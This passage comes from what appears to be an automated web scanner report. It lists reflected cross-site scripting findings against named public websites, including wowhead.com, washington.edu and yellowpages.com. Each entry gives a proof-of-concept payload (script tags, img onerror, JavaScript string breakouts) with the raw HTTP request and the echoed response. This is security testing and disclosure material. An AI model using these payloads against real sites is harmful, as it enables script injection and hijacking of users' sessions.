<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/favicon.ico4df34"><script>alert(1)</script>277514e1af2"/>
...[SNIP]...
6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4544"><script>alert(1)</script>da6a196bf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc4544"><script>alert(1)</script>da6a196bf6a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailyshow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Type: text/html;charset=utf-8
Content-Length: 26317
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:49 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title></title>
       <meta name="description" content=
...[SNIP]...
<link rel="canonical" href="http://www.thedailyshow.com/favicon.icoc4544"><script>alert(1)</script>da6a196bf6a" />
...[SNIP]...
6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c583c"><script>alert(1)</script>086663f75c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoc583c"><script>alert(1)</script>086663f75c8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Sat, 02-Apr-2011 14:40:10 GMT
Set-Cookie: mut=173.193.214.243.1301751610082221; path=/; expires=Sat, 30-Apr-11 13:40:10 GMT; domain=.thehollywoodgossip.com
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=kcfer0dro823m5qhqakd4rpij2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.thehollywoodgossip.com/favicon.icoc583c"><script>alert(1)</script>086663f75c8/" />
...[SNIP]...
6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad228"><script>alert(1)</script>abbf960315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoad228"><script>alert(1)</script>abbf960315 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thirdage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Drupal-Cache: MISS
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:41:56 +0000
Cache-Control: public, max-age=600
Set-Cookie: SESSfa98039aa221fd92e5bcd6d7e3f1cdbb=194f49e907f67adbbd4334f28a385153; expires=Mon, 25 Apr 2011 17:15:16 GMT; path=/; domain=.thirdage.com
Vary: Cookie,Accept-Encoding
Web-Head: web09.advomatic.com
Content-Type: text/html; charset=utf-8
Content-Length: 30060
Date: Sat, 02 Apr 2011 13:41:56 GMT
X-Varnish: 635034219
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<form action="/user/login?destination=/favicon.icoad228"><script>alert(1)</script>abbf960315" method="post" id="user-login">
...[SNIP]...
6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8619e"><script>alert(1)</script>1a24f501080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8619e"><script>alert(1)</script>1a24f501080 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomasnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:57 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: _tnetses=4d972bdd7eed3; path=/; domain=.thomasnet.com
Set-Cookie: _usrvst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tnuind=%7C; path=/; domain=.thomasnet.com
Set-Cookie: am1vst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: am1rm=PP; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tbv2ns=Y; path=/; domain=.thomasnet.com
Set-Cookie: tbv2showPushDown=Y; path=/; domain=.thomasnet.com
Set-Cookie: am1cmp=1; path=/; domain=.thomasnet.com
Set-Cookie: referq=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUS=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: us=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: GID=G13017527975219; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tinid=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUID=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<META name="y_key" content="6e6d842e318a7ef3">
<meta name="verify-v1"
...[SNIP]...
<a href="/print/screen/favicon.ico8619e"><script>alert(1)</script>1a24f501080" onClick="dcsExternal('/link.html','TINCATL1=TNET&TINCATL2=CLICK_PRINTSCREEN','www.thomasnet.com');" target="print" rel="nofollow">
...[SNIP]...
6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a87'-alert(1)-'8bb423fecbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico77a87'-alert(1)-'8bb423fecbf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradekey.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:57:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=bfc0f1346d753424ab94cfa33828a2d4; path=/; domain=.tradekey.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 21900

<html dir=ltr>
<head>
<title>Error 404 Page not found, Business to Business marketplace, Manufacturer directory & import export</title>
<link href="http://imgusr.tradekey.com/domains/tradekey.com/t
...[SNIP]...
Date();
   var d = t.getDate() + "-" + t.getMonth()+1 + "-" + t.getFullYear();
   
   if (seconds > 1 || d == "20-01-2011")
       tk_track_ga_event('IT', 'Page Render Time - www.tradekey.com', '/favicon.ico77a87'-alert(1)-'8bb423fecbf', seconds);
}
var old_load_fx = window.onload;
window.onload = function()
{
   track_page_render_time();
   if (old_load_fx)
       old_load_fx();
}
</script>
...[SNIP]...
6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece72'-alert(1)-'ee1533a6222 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoece72'-alert(1)-'ee1533a6222 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trails.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21954
Expires: Sat, 02 Apr 2011 13:38:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:51 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ahv4dy55qvwmlcyvaiur4g45; domain=.trails.com; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
ils.com',
                   jscdn: 'http://cdn2-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ffavicon.icoece72'-alert(1)-'ee1533a6222',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...
6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7550a"><script>alert(1)</script>10b5dcdc5a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelpod.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:11:07 GMT
Server: Apache
Content-language: "
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7980

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head> <title>Oh, Ohhh ...</title> <link rel="shortcut icon" href="/favicon.ico"/>
<script type="text/javascript">function L
...[SNIP]...
<a href="http://www.travelpod.ca/favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1">
...[SNIP]...
6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videojug.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6eb1'-alert(1)-'18394e848c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /f6eb1'-alert(1)-'18394e848c1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videojug.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 20692
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: VideoJugUser=YnFn6uAuzgEkAAAAYWEzY2U5ZjgtYzNkYi02MmYxLTFiNTAtZmYwMDA4Y2RiZjU10; expires=Mon, 01-Apr-2013 13:57:58 GMT; path=/; HttpOnly
Set-Cookie: abTest=0; expires=Sat, 30-Apr-2011 13:57:58 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gyrhnaenatluzrnn3li1fr55; path=/; HttpOnly
Set-Cookie: VjPrefEd=cc=US&ed=3; expires=Tue, 02-Apr-2013 13:57:58 GMT; path=/
Set-Cookie: AuthCookie=false; expires=Mon, 04-Apr-2011 13:57:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="m mixFlag big UK" href="/chooseedition?ReturnURL=%2ferror%2ferror404%3faspxerrorpath%3d%252froute.ashx%252ff6eb1'-alert(1)-'18394e848c1&amp;NewEdition=2" >
...[SNIP]...
6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f07"><script>alert(1)</script>33281413b15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88f07"><script>alert(1)</script>33281413b15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videosurf.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:39:23 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: PHPSESSID=rm91d0sieefthupdu4pqg3oq33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=95; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d97270b593c3; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: luri=L2Zhdmljb24uaWNvODhmMDciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD4zMzI4MTQxM2IxNQ%3D%3D; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta property="og:url" content="http://www.videosurf.com/favicon.ico88f07"><script>alert(1)</script>33281413b15"/>
...[SNIP]...
6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc0cc"><script>alert(1)</script>d118f04eeae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bc0cc"><script>alert(1)</script>d118f04eeae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.walletpop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=-%3A%3A-%3A%3A%3A%3A%3A%3A%3A%3A-; expires=Sun, 03-Apr-2011 14:20:26 GMT; path=/
Content-Type: text/html
Content-Length: 34369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/bc0cc"><script>alert(1)</script>d118f04eeae/"/>
...[SNIP]...
6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload caf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 was submitted in the REST URL parameter 1. This input was echoed as caf60<img src=a onerror=alert(1)>2b58733a9f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icocaf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washington.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:19:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1174
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/favicon.icocaf60&lt;img src=a onerror=alert(1)&gt;2b58733a9f9</b> was not found or is no lon
...[SNIP]...
<br>
Reason: File does not exist: /www/world/favicon.icocaf60<img src=a onerror=alert(1)>2b58733a9f9.</br>
...[SNIP]...
6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919c3"><script>alert(1)</script>12d36552cd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico919c3"><script>alert(1)</script>12d36552cd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<body class="favicon_ico919c3"><script>alert(1)</script>12d36552cd5">
...[SNIP]...
6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6c7'-alert(1)-'d930151ee15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6a6c7'-alert(1)-'d930151ee15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8122

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<![CDATA[
var g_pageInfo = { articleUrl: 'favicon.ico6a6c7'-alert(1)-'d930151ee15', editAccess: 574 };
//]]>
...[SNIP]...
6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yakaz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 was submitted in the REST URL parameter 1. This input was echoed as d0b98<img src=a onerror=alert(1)>861ec7fe5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icod0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yakaz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Yakaz Web Server
Date: Sat, 02 Apr 2011 13:59:51 GMT
Content-Length: 93174
Content-Type: text/html; charset=utf-8
Set-Cookie: il=en; expires=Sun, 01-Apr-2012 13:59:51 GMT; path=/; domain=.yakaz.com
Set-Cookie: YSID=63238dac50279b2939e0c29adb0e3dea; path=/; domain=.yakaz.com
Set-Cookie: infos=deleted; expires=Fri, 02-Apr-2010 13:59:50 GMT; path=/; domain=.yakaz.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:v="urn:schemas-microsoft-co
...[SNIP]...
<h1>Favicon.icod0b98<img Src=a Onerror=alert(1)>861ec7fe5e5</h1>
...[SNIP]...
6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54dd2</script><a>f1938ad83fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /54dd2</script><a>f1938ad83fa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:27 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "efc9b484b7207b82659734d8cfebfe0f"
Cache-Control: no-cache
Set-Cookie: search_terms=script%3E%3Ca%3Ef1938ad83fa; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+jh14baofnio57yzbozczk0ikdipjq%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A26.842806+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A26.842811+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:26 GMT
Set-Cookie: vrid=de53bf40-3f54-012e-53bd-00163ebee541; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:26 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlNGUzNjI4OGEyMDYyYzdkMDlhODhhYjk2Njk3ODhhYjM6E2RleF9zZXNzaW9uX2lkSSIpZGU1NTdmZTAtM2Y1NC0wMTJlLTUzYmUtMDAxNjNlYmVlNTQxBjoGRUY%3D--a614b3974beb8c37155b66aa649d5cc0df7037fd; path=/; HttpOnly
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-ddea1480-3f54-012e-fd15-00163ebee541
Expires: Sat, 02 Apr 2011 12:44:26 GMT
Content-Length: 324385

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
aq.push(['_setAllowAnchor',true]);
_gaq.push(['_setDomainName', ".yellowpages.com"]);
_gaq.push(['_setCustomVar', 1, 'trial_id', "relevancyControl1", 1]);

_gaq.push(['_trackPageview','/54dd2</script><a>f1938ad83fa?gasearch=script%3E%3Ca%3Ef1938ad83fa']);

(function() {
var s, ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = "http://www.goo
...[SNIP]...
6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 was submitted in the REST URL parameter 1. This input was echoed as c496d<img src=a onerror=alert(1)>63985e825a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:41 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 706
